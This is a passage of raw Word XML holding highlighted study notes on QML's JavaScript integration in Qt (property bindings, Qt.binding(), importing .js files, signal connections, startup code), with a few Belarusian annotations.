            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>custom methods</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="0032277F" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Standalone</w:t>
      </w:r>
      <w:r w:rsidRPr="00927375">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="00927375">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript resource (.js) files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="00935691"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In fact, any JavaScript expression (no matter how complex) may be used </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in a property binding definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as long as the result of the expression is a value whose type can be assigned to the property. This includes side effects. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>complex bindings and side effects are discouraged</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> because they </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can reduce the performance, readability, and maintainability of the code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="004B752E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are two ways to define a property binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: the first (and most common) is, as previously shown, in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:anchor="value-assignment-on-initialization" w:history="1">
        <w:r w:rsidRPr="008E5B4D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property initialization</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The second (and much </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rarer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) way is to assign the property a function returned from the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:anchor="binding-method" w:history="1">
        <w:r w:rsidRPr="008E5B4D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.binding()</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function, from within imperative JavaScript code, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032277F" w:rsidRPr="00D815C8" w:rsidRDefault="004B752E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be defined </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and may be called from signal handlers, property bindings, or functions in other QML objects.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methods defined in this way are often referred to as</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inline JavaScript functions</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because their implementation is included in the QML object type definition (QML document), as opposed to an external JavaScript file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B752E" w:rsidRPr="00D815C8" w:rsidRDefault="001E2833" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-trivial program logic is best separated into external JavaScript files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2833" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9"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These files can be imported into QML files using an</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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in the same way that</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>modules</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are imported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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"factorial.js"</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as</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MathFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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8418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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Item</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8418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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MouseArea</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8418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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anchors.fill: parent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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onClicked: console.log(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>MathFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.factorial(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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8418A9" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="008418A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4B752E" w:rsidRPr="00D815C8" w:rsidRDefault="008418A9" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Цікавае ключавое слова </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="00495F97" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sometimes, however, a client will want to cause a signal emitted from one object to trigger a function defined in another object; and in that case, a signal connection is often preferable.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Кантэкст выкарыстання злучэння сігналаў і функцый.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008418A9" w:rsidRPr="00D815C8" w:rsidRDefault="00495F97"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A signal emitted by a QML object may be connected to a JavaScript function by calling the signal's </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> method and passing the JavaScript function as an argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="00495F97" w:rsidP="008E5B4D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc483000532"/>
      <w:bookmarkStart w:id="67" w:name="_Toc483603892"/>
      <w:bookmarkStart w:id="68" w:name="_Toc483605112"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript in Application Startup Code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="00517306" w:rsidRPr="00D815C8" w:rsidRDefault="006B13CE" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is occasionally necessary to run some imperative code at application (or component instance) startup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="006B13CE"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While it is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tempting to just include the startup script </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global code</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 xml:space="preserve">in an external script file, this can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>severe limitations</w:t>
      </w:r>
